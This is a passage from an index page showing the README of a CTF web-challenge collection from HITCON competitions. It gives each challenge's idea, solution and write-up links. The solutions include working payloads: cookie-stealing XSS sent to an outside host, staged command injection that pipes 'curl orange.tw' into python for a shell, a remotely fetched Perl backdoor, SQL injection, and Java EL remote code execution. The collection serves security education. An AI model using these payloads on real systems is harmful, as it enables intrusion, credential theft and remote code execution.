Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/orangetw/my-ctf-web-challenges
Collection of CTF Web challenges I made
https://github.com/orangetw/my-ctf-web-challenges
Last synced: 27 days ago
JSON representation
Collection of CTF Web challenges I made
- Host: GitHub
- URL: https://github.com/orangetw/my-ctf-web-challenges
- Owner: orangetw
- Created: 2016-10-12T17:57:17.000Z (about 8 years ago)
- Default Branch: master
- Last Pushed: 2023-11-08T09:07:46.000Z (about 1 year ago)
- Last Synced: 2024-10-15T04:42:13.552Z (27 days ago)
- Language: PHP
- Size: 59.1 MB
- Stars: 2,676
- Watchers: 142
- Forks: 476
- Open Issues: 3
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
- awesome-security-collection - **1748**星
README
# My CTF Web Challenges
This is the repository of all CTF challenges I made, including the source code, write-up and idea explanation!
Hope you like it :)
**P.s.** BTW, the `Babyfirst` series and `One Line PHP Challenge` are my favorite challenges. If you haven't enough time, please look them at least!
* [Babyfirst](#babyfirst)
* [Babyfirst Revenge](#babyfirst-revenge)
* [Babyfirst Revenge v2](#babyfirst-revenge-v2)
* [One Line PHP Challenge](#one-line-php-challenge)
And you can find me via:
* Email: [email protected]
* Blog: [http://blog.orange.tw](http://blog.orange.tw/)
* Twitter: [@orange_8361](https://twitter.com/orange_8361)
## **Table of Content**
* [HITCON 2021](#W3rmup-PHP)
* [W3rmup PHP](#W3rmup-PHP)
* [One-Bit Man](#One-Bit-Man)
* [Metamon Verse](#Metamon-Verse)
* [FBI Warning](#FBI-Warning)
* [Vulpixelize](#Vulpixelize)
* [HITCON 2020](#oShell)
* [oShell](#oShell)
* [oStyle](#oStyle)
* [Return of Use-After-Flee](#return-of-use-after-flee)
* [HITCON 2019 Quals](#virtual-public-network)
* [Virtual Public Network](#virtual-public-network)
* [Bounty Pl33z](#bounty-pl33z)
* [GoGo PowerSQL](#gogo-powersql)
* [Luatic](#luatic)
* [Buggy .Net](#buggy-net)
* [HITCON 2018](#one-line-php-challenge)
* [One Line PHP Challenge](#one-line-php-challenge)
* [Baby Cake](#baby-cake)
* [Oh My Raddit](#oh-my-raddit)
* [Oh My Raddit v2](#oh-my-raddit-v2)
* [Why so Serials?](#why-so-serials)
* [HITCON 2017 Quals](#babyfirst-revenge)
* [BabyFirst Revenge](#babyfirst-revenge)
* [BabyFirst Revenge v2](#babyfirst-revenge-v2)
* [SSRFme?](#ssrfme)
* [SQL so Hard](#sql-so-hard)
* [Baby^H Master PHP 2017](#babyh-master-php-2017)
* [HITCON 2016 Quals](#papapa)
* [%%%](#papapa)
* [Leaking](#leaking)
* [BabyTrick](#babytrick)
* [Angry Boy](#angry-boy)
* [Angry Seam](#angry-seam)
* [HITCON 2015 Quals](#babyfirst)
* [Babyfirst](#babyfirst)
* [nanana](#nanana)
* [Giraffe's Coffee](#giraffes-coffee)
* [lalala](#lalala)
* [Use-After-FLEE](#use-after-flee)
* [HITCON 2014 Quals](#pushincat)
* [PUSHIN CAT](#pushincat)
* [PY4H4SHER](#py4h4sher)
* [LEENODE](#leenode)
* [WCTF 2016](#blackbox)
* [BlackBox](#blackbox)
* [AIS3 Final 2015 Final](#sqlpwn)
* [SQLPWN](#sqlpwn)
## **W3rmup PHP**
Difficulty: **★★**
Solved: **22 / 666**
Tag: **PHP**, **Code Review**, **YAML** ,**Command Injection**
#### Source Code
* [Source](hitcon-ctf-2021/W3rmup-PHP/)
#### Idea
* [The Norway Problem](https://hitchdev.com/strictyaml/why/implicit-typing-removed/), the country code of Norway (NO) becomes `False` in YAML
* Bypass the `escapeshellarg` by the logic problem of `count()` + `unset()`
#### Solution
* TBD
#### Write Ups
* TBD
## **One-Bit Man**
Difficulty: **★**
Solved: **49 / 666**
Tag: **PHP**, **Code Review**
#### Source Code
* [Source](hitcon-ctf-2021/One-Bit-Man/)
#### Idea
You can flip 1-bit on any file of the latest version of WordPress and you have to pwn the server.
#### Solution
Flip the position `5389` of the file `/var/www/html/wp-includes/user.php` to NOP the NOT (`!`) operation.
```php
if ( ! wp_check_password( $password, $user->user_pass, $user->ID ) ) {
return new WP_Error(
```
#### Write Ups
* TBD
## **Metamon Verse**
Difficulty: **★★★☆**
Solved: **9 / 666**
Tag: **NFS**, **SSRF** ,**RCE**
#### Source Code
* [Source](hitcon-ctf-2021/Metamon-Verse/)
#### Idea
The idea is using the SSRF to communicate with the local NFS/RPC server to get the RCE. To complete the exploit, you have to:
1. Construct the `RPC/PORTMAP_CALL` packet and send to `gopher://127.0.0.1:111/` to get the port of `mountd` service.
2. Construct the `RPC/MNT_CALL` packet and send to `gopher://127.0.0.1:/` to get the file-handler of `/data` volume (remember to specify `CURLOPT_LOCALPORT` to bypass the authentication)
3. Construct the `RPC/NFS_CALL` packet and send to `gopher://127.0.0.1:2049/` to create a SYMLINK (remember to specify `CURLOPT_LOCALPORT` to bypass the authentication)
4. Symlink the `/app/templates/index.html` to a controllable file to get a SSTI and get the RCE!
#### Solution
An dirty exploit code can be found [here](https://gist.github.com/orangetw/6d34ff98a6332bc0523b35ea952a790d)
#### Write Ups
* TBD
## **FBI Warning**
Difficulty: **☆**
Solved: **25 / 666**
Tag: **MISC**, **OSINT** ,**PHP**, **Code Review**
#### Source Code
* [Source](hitcon-ctf-2021/FBI-Warning/)
#### Idea
The website uses a famous Message Board project [futaba-ng](https://github.com/futoase/futaba-ng), and the ID generation is based on `REMOTE_ADDR`:
```php
define("IDSEED", 'idの種'); //idの種
...
$now.=" ID:".substr(crypt(md5($_SERVER["REMOTE_ADDR"].IDSEED.gmdate("Ymd", $time+9*60*60)),'id'),-8);
```
#### Solution
Because of the known IP prefix, you can identify the IP address of Ωrange by brute-force easily.
```php
var_dump( substr(crypt(md5("219.91.64.47"."idの種"."20211203"),"id"),-8) == "ueyUrcwA" )
// bool(true)
```
#### Write Ups
* TBD
## **Vulpixelize**
Difficulty: **★☆**
Solved: **41 / 666**
Tag: **Browser**, **Feature**
#### Source Code
* [Source](hitcon-ctf-2021/Vulpixelize/)
#### Idea
Use the Chrome new feature [Text Fragments](https://wicg.github.io/scroll-to-text-fragment/) to extract the flag.
#### Solution
* TBD
#### Write Ups
* TBD
## **oShell**
Difficulty: **★★**
Solved: **21 / 1281**
Tag: **BlackBox**, **Shell** ,**Command Injection**
#### Source Code
* [Source](hitcon-ctf-2020/oShell/)
#### Solution
1. Leveraging `strace` in `htop` to read enable secret.
2. Writing `/home/oShell/.toprc` with `tcpdump -w`
3. Abusing `top` inspect feature to run arbitrary commands
#### Write Ups
* [Writeup from team FrenchRoomba](https://github.com/FrenchRoomba/ctf-writeup-HITCON-CTF-2020/tree/master/oShell)
## **oStyle**
Difficulty: **★★☆**
Solved: **10 / 1281**
Tag: **XSS**
#### Source Code
* [Source](hitcon-ctf-2020/oStyle/)
#### Solution
* The default Apache installation enabled `mod_negotiation`, which allows `.var` mapping and you can specify arbitrary content-type there.
**test.var**
```
Content-language: en
Content-type: text/html
Body:----foo----
fetch('http://orange.tw/?' + escape(document.cookie))
----foo----
```
#### Write Ups
* TBD
## **Return of Use-After-Flee**
Difficulty: **★★★★★**
Solved: **0 / 1281**
Tag: **WhiteBox**, **PHP**, **UAF**, **PWN**
#### Source Code
* [Source](hitcon-ctf-2020/Return-of-Use-After-Flee/)
#### Solution
* Exploiting `CVE-2015-0273` to pop the shell without known binaries. More detail will be published in [my blog](http://blog.orange.tw/) soon.
#### Write Ups
* TBD
## **Virtual Public Network**
Difficulty: **★☆**
Solved: **81 / 1147**
Tag: **WhiteBox**, **Perl**, **Command Injection**
#### Source Code
* [Source](hitcon-ctf-2019/virtual-public-network/)
#### Solution
* Refer my blog and Black Hat 2019 USA slides for details
* [Attacking SSL VPN - Part 3: The Golden Pulse Secure SSL VPN RCE Chain, with Twitter as Case Study!](https://blog.orange.tw/2019/09/attacking-ssl-vpn-part-3-golden-pulse-secure-rce-chain.html)
* [Infiltrating Corporate Intranet Like NSA: Pre-auth RCE on Leading SSL VPNs](https://i.blackhat.com/USA-19/Wednesday/us-19-Tsai-Infiltrating-Corporate-Intranet-Like-NSA.pdf)
```
http://13.231.137.9/cgi-bin/diag.cgi
?options=-r@a="ls -alh /",system@a%23 2>tmp/orange.thtml <
&tpl=orange
```
#### Write Ups
* TBD
## **Bounty Pl33z**
Difficulty: **★★★☆**
Solved: **30 / 1147**
Tag: **XSS**
#### Source Code
* [Website](hitcon-ctf-2019/bounty-pl33z/www/)
* [XSS bot](hitcon-ctf-2019/bounty-pl33z/bot/)
#### Solution
* Idea from [@FD](https://twitter.com/filedescriptor) - A little known JavaScript comment style [SingleLineHTMLOpenComment](https://www.ecma-international.org/ecma-262/10.0/index.html#prod-annexB-SingleLineHTMLOpenComment) and [HTMLCloseComment](https://www.ecma-international.org/ecma-262/10.0/index.html#prod-annexB-HTMLCloseComment) in EMCA specification.
Here we use unicode `U+2028` and `U+3002` to bypass `\n` and `.` filters.
```
http://3.114.5.202/fd.php
?q=ssl。orange。tw?xx"%2bdocument[`cookie`]%E2%80%A8-->
```
#### Unintended Solution
* Nesting template expression
```
http://3.114.5.202/fd.php
?q=ssl。orange。tw?`%2b"%2bdocument[`cookie`];(`${`
```
#### Write Ups
* TBD
## **GoGo PowerSQL**
Difficulty: **★★★☆**
Solved: **16 / 1147**
Tag: **Environment Injection**, **MySQL Client Attack**
#### Source Code
* [Docker](hitcon-ctf-2019/gogo-powersql/)
#### Solution
1. Buffer Overflow the `DB_HOST` in BSS
2. Due to the [patch](hitcon-ctf-2019/gogo-powersql/Dockerfile#L20), we can pollute environment variable which are not in the [Blacklist](https://github.com/embedthis/goahead/blob/v4.0.0/src/cgi.c#L170).
3. Hijack MySQL connection by ENV such as `LOCALDOMAIN` or `HOSTALIAES`
4. Read `/FLAG` by `LOAD DATA LOCAL INFILE`.
```python
import requests
payload = ['x=x' for x in range(254)]
payload.append('name=x')
payload.append('HOSTALIASES=/proc/self/fd/0')
payload.append('orangeeeee=go')
payload = '&'.join(payload)
data = 'orangeeeee my.orange.tw'
r = requests.post('http://13.231.38.172/cgi-bin/query?'+payload, data=data)
print r.content
```
```shell
$ git clone https://github.com/lcark/MysqlClientAttack.git
$ cd MysqlClientAttack
$ python main.py -F /FLAG
```
#### Write Ups
* TBD
## **Luatic**
Difficulty: **★★☆**
Solved: **42 / 1147**
Tag: **WhiteBox**, **Redis**, **Lua**
#### Source Code
* [Docker](hitcon-ctf-2019/luatic/)
#### Solution
1. Override PHP global variables.
2. Redis [implements](https://github.com/antirez/redis/blob/ee1cef189fff604f165b2d20a307545840de944e/src/scripting.c#L1363) `eval` command by string concatenations so that we can escape the original Lua function to override global objects.
```
http://54.250.242.183/luatic.php
?_POST[TEST_KEY]=return 1 end function math:random() return 2
&_POST[TEST_VALUE]=0
&_POST[MY_SET_COMMAND]=eval
&_POST[token]=
&_POST[guess]=2
```
```
http://54.250.242.183/luatic.php
?_POST[token]=
&_POST[guess]=2
```
#### Unintended Solution
* Lua is so magic that there are several unintended solutions. Sorry for the imperfect challenge :(
#### Write Ups
* TBD
## **Buggy .Net**
Difficulty: **★☆**
Solved: **13 / 1147**
Tag: **ASP.NET**, **WhiteBox**
#### Source Code
* [Default.aspx](hitcon-ctf-2019/buggy-net/Default.aspx)
#### Solution
* Using .NET request validation to trigger the exception and bypass the filter
* Idea from [Soroush Dalili](https://twitter.com/irsdl)'s [WAF Bypass Techniques - Using HTTP Standard and Web Servers' Behaviour](https://www.slideshare.net/SoroushDalili/waf-bypass-techniques-using-http-standard-and-web-servers-behaviour) in AppSec Europe 2018(p30~p34)
```
GET / HTTP/1.1
Host: buggy
Content-Type: application/x-www-form-urlencoded; charset=ibm500
Content-Length: 61
%86%89%93%85%95%81%94%85=KKaKKa%C6%D3%C1%C7K%A3%A7%A3&x=L%A7n
```
```python
from urllib import quote
s = lambda x: quote(x.encode('ibm500'))
print '%s=%s&x=%s' % (s('filename'), s('../../FLAG.txt', s(''))
```
#### Write Ups
* TBD
## **One Line PHP Challenge**
Difficulty: **★★★★**
Solved: **3 / 1816**
Tag: **PHP**
#### Source Code
* [index.php](hitcon-ctf-2018/one-line-php-challenge/src/index.php)
#### Solution
P.S. This is a default installation PHP7.2 + Apache on Ubuntu 18.04
1. Control partial session file content by `PHP_SESSION_UPLOAD_PROGRESS`
2. Bypass `session.upload_progress.cleanup = On` by `race condition` or `slow query`
3. Control the prefix to `@g` to file "_"
http://host/?cmd=>ls\
http://host/?cmd=ls>_
http://host/?cmd=>\ \
http://host/?cmd=>-t\
http://host/?cmd=>\>g
http://host/?cmd=ls>>_
# generate `curl orange.tw|python` to file "g"
http://host/?cmd=>on
http://host/?cmd=>th\
http://host/?cmd=>py\
http://host/?cmd=>\|\
http://host/?cmd=>tw\
http://host/?cmd=>e.\
http://host/?cmd=>ng\
http://host/?cmd=>ra\
http://host/?cmd=>o\
http://host/?cmd=>\ \
http://host/?cmd=>rl\
http://host/?cmd=>cu\
http://host/?cmd=sh _
# got shell
http://host/?cmd=sh g
```
You can check the [exploit.py](hitcon-ctf-2017/babyfirst-revenge/exploit.py) for the detail! And there are also lots of creative solutions, you can check the write ups below.
#### Write Ups
* [HITCON CTF 2017-BabyFirst Revenge-writeup](https://chybeta.github.io/2017/11/04/HITCON-CTF-2017-BabyFirst-Revenge-writeup/)
* [HITCON CTF 2017-BabyFirst Revenge-writeup (Via curl)](http://www.jianshu.com/p/82788b6949c7)
* [HITCON 2017 CTF BabyFirst Revenge](https://infosec.rm-it.de/2017/11/06/hitcon-2017-ctf-babyfirst-revenge/)
* [HITCON CTF 2017 - BabyFirst Revenge (172 pts.)](https://kimtruth.github.io/2017/11/06/HITCON-CTF-2017-BabyFirst-Revenge-172-pts/)
* [Hitcon CTF 2017 - Baby Revenge](https://theromanxpl0it.github.io/ctf_hitcon2017/babyrevenge/)
* [Hitcon CTF 2017 Quals: Baby First Revenge (web 172) (Via xxd)](https://losfuzzys.github.io/writeup/2017/11/06/hitconctf-babyfirstrevenge/)
* [HITCON CTF 2017 BabyFirst Revenge & v2 writeup](https://findneo.github.io/2017/11/HITCON-CTF-2017-Babyfirst-Revenge-series-writeup/)
* [BabyFirst-Revenge-HITCOIN-2017-QUALS by @n4p5ter](https://github.com/n4p5ter/BabyFirst-Revenge-HITCOIN-2017-QUALS)
## **BabyFirst Revenge v2**
Difficulty: **★★★★**
Solved: **8 / 1541**
Tag: **WhiteBox**, **PHP**, **Command Injection**
#### Idea
* Command Injection, but only in **4** bytes
#### Source Code
* [index.php](hitcon-ctf-2017/babyfirst-revenge-v2/index.php)
#### Solution
1. generate `g> ht- sl` to file `v`
2. reverse file `v` to file `x`
4. generate `curl orange.tw|python;`
6. execute `x`, `ls -th >g`
7. execute `g`
You can check [exploit.py](hitcon-ctf-2017/babyfirst-revenge-v2/exploit.py) for the detail!
#### Write Ups
* [Baby First Revenge v2 (Via vim) by @bennofs](https://github.com/bennofs/docs/blob/master/hitcon-2017/baby-first-revenge2.md)
* [\[python\] baby-exp.py](https://codegists.com/snippet/python/baby-exppy_beched_python)
* [How to solve a CTF challenge for $20 - HITCON 2017 BabyFirst Revenge v2](https://www.eugenekolo.com/blog/hitcon-babyfirst-revenge-v2/)
* [HITCON CTF 2017 BabyFirst Revenge & v2 writeup](https://findneo.github.io/2017/11/HITCON-CTF-2017-Babyfirst-Revenge-series-writeup/)
## **SSRFme?**
Difficulty: **★★☆**
Solved: **20 / 1541**
Tag: **WhiteBox**, **Perl**, **PATH Pollution**
#### Idea
* [CVE-2016-1238](https://perl5.git.perl.org/perl.git/commit/cee96d52c39b1e7b36e1c62d38bcd8d86e9a41ab) (But the latest version of Ubuntu 17.04 in AWS is still vulnerable)
* Perl lookup current directory in module importing
* Perl module [URI/lib/URI.pm#L136](https://github.com/libwww-perl/URI/blob/b7680860f323a0cf3ffe5f6bdb684646e1ecac33/lib/URI.pm#L136) will `eval` if there is a unknown scheme
#### Source Code
* [index.php](hitcon-ctf-2017/ssrfme/index.php)
```bash
$ sudo apt install libwww-perl
```
#### Solution
```bash
# write evil URI module to current directory
$ curl http://host/?filename=URI/orange.pm&url=http://orange.tw/w/backdoor.pl
# eval evil module `orange`
$ curl http://host/?filename=xxx&url=orange://orange.tw
```
#### Write Ups
* [Another Solution by @Paul_Axe](https://twitter.com/Paul_Axe/status/927669724439293953)
* [HITCON 2017 SSRFme](https://ricterz.me/posts/HITCON%202017%20SSRFme)
* [SSRFme by @sorgloomer](https://github.com/sorgloomer/writeups/blob/master/writeups/2017-hitcon-quals/ssrfme.md)
## **SQL so Hard**
Difficulty: **★★★**
Solved: **10 / 1541**
Tag: **WhiteBox**, **MySQL**, **PostgreSQL**, **SQL Injection**, **Code Injection**
#### Idea
* MySQL `max_allowed_packet` dropped large size SQL sentence
* [Node-Postgres - code execution vulnerability](https://node-postgres.com/announcements#2017-08-12-code-execution-vulnerability)
* Exploit the RCE in SQL `UPDATE` syntax
#### Source Code
* [app.js](hitcon-ctf-2017/sql-so-hard/app.js)
#### Solution
* [exploit.py](hitcon-ctf-2017/sql-so-hard/exploit.py)
#### Write Ups
* [SQL so Hard by @sorgloomer](https://github.com/sorgloomer/writeups/blob/master/writeups/2017-hitcon-quals/sql-so-hard.md)
## **Baby^H Master PHP 2017**
Difficulty: **★★★★☆**
Solved: **0 / 1541**
Tag: **WhiteBox**, **PHP**, **Serialization**, **Apache Prefock**
#### Idea
* PHP do the de-serialization on `PHAR` parsing
* PHP assigned a predictable function name `\x00lambda_%d` to an anonymous function
* Break shared VARIABLE state in Apache Pre-fork mode
#### Source Code
* [index.php](hitcon-ctf-2017/baby^h-master-php-2017/index.php)
#### Solution
```bash
# get a cookie
$ curl http://host/ --cookie-jar cookie
# download .phar file from http://orange.tw/avatar.gif
$ curl -b cookie 'http://host/?m=upload&url=http://orange.tw/'
# force apache to fork new process
$ python fork.py &
# get flag
$ curl -b cookie "http://host/?m=upload&url=phar:///var/www/data/$MD5_IP/&lucky=%00lambda_1"
```
* [avatar.gif](hitcon-ctf-2017/baby^h-master-php-2017/avatar.gif)
* [fork.py](hitcon-ctf-2017/baby^h-master-php-2017/fork.py)
#### Write Ups
* [По умолчанию Чтение файлов => unserialize !](https://rdot.org/forum/showthread.php?t=4379)
## **papapa**
Difficulty: **★**
Solved: **71 / 1024**
Tag: **BlackBox**, **SSL**, **Pentesting**
#### Idea
* Leak the internal hostname from SSL certificate
#### Source Code
* [here](hitcon-ctf-2016/papapa)
#### Solution
```bash
$ openssl s_client -showcerts -connect 1.2.3.4:443 < /dev/null | openssl x509 -text | grep -A 1 "Subject Alternativer Name"
...
depth=0 C = TW, ST = Some-State, O = Internet Widgits Pty Ltd, CN = very-secret-area-for-ctf.orange.tw, emailAddress = [email protected]
...
# get flag
$ curl -k -H "host: very-secret-area-for-ctf.orange.tw" https://1.2.3.4/
```
#### Write Ups
* [HITCON 2016](https://dinhbaoluciusteam.wordpress.com/2016/10/10/hitcon-2016/)
* [HITCON CTF 2016: %%% (Web) Write-up](http://icheernoom.blogspot.tw/2016/10/hitcon-ctf-2016-web-write-up.html)
* [\[HITCON 2016\] \[WEB 100 - %%%\] WRITE UP](https://0x90r00t.com/2016/10/10/hitcon-2016-web-100-write-up/)
* [hitcon2016 web writeup](http://lorexxar.cn/2016/10/10/hitcon2016/)
## **Leaking**
Difficulty: **★★**
Solved: **43 / 1024**
Tag: **WhiteBox**, **JavaScript**, **NodeJS**
#### Idea
* Break JavaScript Sandbox
* Use NodeJS `Buffer(int)` to steal uninitialized memory
* [Node.js Buffer knows everything](https://github.com/ChALkeR/notes/blob/master/Buffer-knows-everything.md)
#### Source Code
* [here](hitcon-ctf-2016/leaking)
#### Solution
```bash
$ while true; do curl 'http://1.2.3.4/?data=Buffer(1e4)' | grep -a hitcon; done;
```
#### Write Ups
* [Hello HitCon 2016 CTF](https://ctfs.ghost.io/hello-hitcon-2016-ctf/#leaking)
* [HITCON 2016 web 总结](http://0x48.pw/2016/10/14/0x24/)
* [hitcon2016 web writeup](http://lorexxar.cn/2016/10/10/hitcon2016/)
## **BabyTrick**
Difficulty: **★★★**
Solved: **24 / 1024**
Tag: **WhiteBox**, **PHP**, **MySQL**, **SQL Injection**, **Unserialize**
#### Idea
* [Create an Unexpected Object and Don't Invoke \_\_wakeup() in Deserialization](https://bugs.php.net/bug.php?id=72663)
* [SugarCRM v6.5.23 PHP反序列化對象注入漏洞](http://blog.knownsec.com/2016/09/sugarcrm-v6-5-23-php%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%AF%B9%E8%B1%A1%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/)
* MySQL UTF-8 collation - `SELECT 'Ä'='a'` is True
#### Source Code
* [here](hitcon-ctf-2016/babytrick)
#### Solution
```bash
# get password
curl http://1.2.3.4/
?data=O:6:"HITCON":3:{s:14:"%00HITCON%00method";s:4:"show";s:12:"%00HITCON%00args";a:1:{i:0;s:39:"'union%20select%201,2,password%20from%20users%23";}}
# get flag
curl http://1.2.3.4/
?data=O:6:"HITCON":2:{s:14:"%00HITCON%00method";s:5:"login";s:12:"%00HITCON%00args";a:2:{i:0;s:7:"orÄnge";i:1;s:13:"babytrick1234";}}
```
#### Write Ups
* [Hitcon 2016 – Baby Trick](http://0xecute.com/index.php/2016/10/10/baby-trick/)
* [Hello HitCon 2016 CTF](https://ctfs.ghost.io/hello-hitcon-2016-ctf/#babytrick)
* [hitcon2016 web writeup](http://lorexxar.cn/2016/10/10/hitcon2016/)
## **Angry Boy**
Difficulty: **★★☆**
Solved: **43 / 1024**
Tag: **GrayBox**, **Java**
#### Idea
* `new String(new byte[] {1, -1, 1, -1})` will output `01EFBFBD01EFBFBD`, not `01FF01FF`
* [When ‘EFBFBD’ And Friends Come Knocking: Observations Of Byte Array To String Conversions](https://blog.gdssecurity.com/labs/2015/2/18/when-efbfbd-and-friends-come-knocking-observations-of-byte-a.html)
#### Source Code
* [here](hitcon-ctf-2016/angry%20boy)
#### Solution
* [exploit.py](hitcon-ctf-2016/angry%20boy/exploit.py)
* [decrpt.py](hitcon-ctf-2016/angry%20boy/decrypt.py)
#### Write Ups
* [Angry Boy - Web 300 Problem](https://github.com/pwning/public-writeup/tree/master/hitcon2016/web300-angryboy)
## **Angry Seam**
Difficulty: **★★★★**
Solved: **4 / 1024**
Tag: **GrayBox**, **Java**, **Seam Framework**, **CSS RPO**, **EL Injection**, **Java Deserialization**
#### Idea
* CSS Relative Path Overwrite
* Built-in redirection parameter `actionOutcome`
* [RPO Gadgets](http://blog.innerht.ml/rpo-gadgets/)
* [CVE-2010-1871: JBoss Seam Framework remote code execution](http://blog.o0o.nu/2010/07/cve-2010-1871-jboss-seam-framework.html)
#### Source Code
* [here](hitcon-ctf-2016/angry%20seam)
#### Solution
**P.s.** I made this challenge because once when I try to review the code of Seam Framework, I found some 0-days and I think it must have more. So I throw out the brick to attract a jade. And the result is more than I expected :P
**Intended solution**
* Register an account
```
username: `AAAAAA`
password: `AAAAAA`
realname: `{/*';*/}%0a@import'http://orange.tw/?`
```
* Report URL
```
http://1.2.3.4:8080/angryseam/profile.seam?actionOutcom>e=/profile.seam?username%3dAAAAAA
```
**Unintended solution**
* Register an account
* Update description to
* Login and access
```
/?x=#{expressions.instance().createValueExpression(request.getHeader('cmd')).getValue()}
```
```
GET /angryseam/template.seam?actionMethod=template.xhtml:util.escape(sessionScope['user'].getDescription()) HTTP/1.1
host: 1.2.3.4
cmd: #{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[15].invoke(expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[7].invoke(null),request.getHeader('ccc'))}
ccc: ls -alh
...
```
**Unintended solution**
* CVE-2013-2165 Java deserialization vulnerability
**Unintended solution**
* SESSION manipulation... seam SUCKS
#### Write Ups
* [Web500 Hitconctf 2016 and exploit CVE-2013-2165](http://vnprogramming.com/index.php/2016/10/10/web500-hitconctf-2016-and-exploit-cve-2013-2165/)
* [Angry Seam (500 pts)](https://github.com/Blaklis/write-ups/tree/master/hitcon)
## **Babyfirst**
Solved: **33 / 969**
Difficulty: **★★**
Tag: **WhiteBox**, **PHP**, **Command Injection**
#### Idea
* Use `NewLine` to bypass regular expression check
* Command injection only with alphanumeric characters
#### Source Code
* [here](hitcon-ctf-2015/babyfirst)
```php
```
#### Solution
```text
http://localhost/
?args[0]=x%0a
&args[1]=mkdir
&args[2]=orange%0a
&args[3]=cd
&args[4]=orange%0a
&args[5]=wget
&args[6]=846465263%0a
http://localhost/
?args[0]=x%0a
&args[1]=tar
&args[2]=cvf
&args[3]=aa
&args[4]=orange%0a
&args[5]=php
&args[6]=aa
```
And there are also lots of creative solutions, you can check the write ups below.
#### Write Ups
* [babyfirst (web 100)](https://github.com/pwning/public-writeup/blob/master/hitcon2015/web100-babyfirst/writeup.md)
* [HITCON CTF 2015 Web 100 Web 300 Writeup](http://5alt.me/posts/2015/10/HITCON%20CTF%202015%20Web%20100%20Web%20300%20Writeup.html)
* [HITCON 2015 Quals: Babyexploit](https://kt.pe/blog/2015/10/hitcon-2015-quals-babyexploit/)
* [Babyfirst (web, 100p, ?? solves)](https://github.com/p4-team/ctf/tree/master/2015-10-18-hitcon/web_100_babyfirst#eng-version)
## **nanana**
Difficulty: **★★★**
Solved: **18 / 969**
Tag: **GrayBox**, **C**, **PWN**
#### Idea
* Pwn without library
* Format String without output
* Bypass Stack Guard by using overflow `ARGV[1]`
#### Source Code
* [here](hitcon-ctf-2015/nanana/)
#### Solution
* [exploit.py](hitcon-ctf-2015/nanana/exploit.py)
#### Write Ups
* [nanana (pwn, web 200)](https://github.com/pwning/public-writeup/blob/master/hitcon2015/web200-nanana/writeup.md)
* [HITCON 2015 Quals: Nanana](https://kt.pe/blog/2015/10/hitcon-2015-quals-nanana/)
* [Pwning (sometimes) with style - Dragons’ notes on CTFs](http://j00ru.vexillium.org/blog/24_03_15/dragons_ctf.pdf)
## **Giraffe's Coffee**
Difficulty: **★★★☆**
Solved: **16 / 969**
Tag: **WhiteBox**, **PHP**
#### Idea
* Break PHP PRNG
* Break shared PRNG STATE in Apache Prefork mode
#### Source Code
* [here](hitcon-ctf-2015/giraffe's-coffee)
#### Solution
TBD
#### Write Ups
* [HITCON CTF 2015 Web 100 Web 300 Writeup](http://5alt.me/posts/2015/10/HITCON%20CTF%202015%20Web%20100%20Web%20300%20Writeup.html)
* [Giraffe's Coffee - Web 300 Problem - Writeup by Robert Xiao (@nneonneo)](https://github.com/pwning/public-writeup/blob/master/hitcon2015/web300-giraffes-coffee/readme.md)
* [HITCON 2015 WEB 300](https://docs.google.com/document/d/1NlCF4jykgwuUMkr0I8HjbLRUKNAGf6jzRiI2D9TyumA/edit)
## **lalala**
Difficulty: **★★★☆**
Solved: **2 / 969**
Tag: **BlackBox**, **PHP**, **SSRF**
#### Idea
* Bypass SSRF restrictiton with 302 redirect
* Exploit FASTCGI protocol by using GOPHER
#### Source Code
* [here](hitcon-ctf-2015/lalala)
#### Solution
```php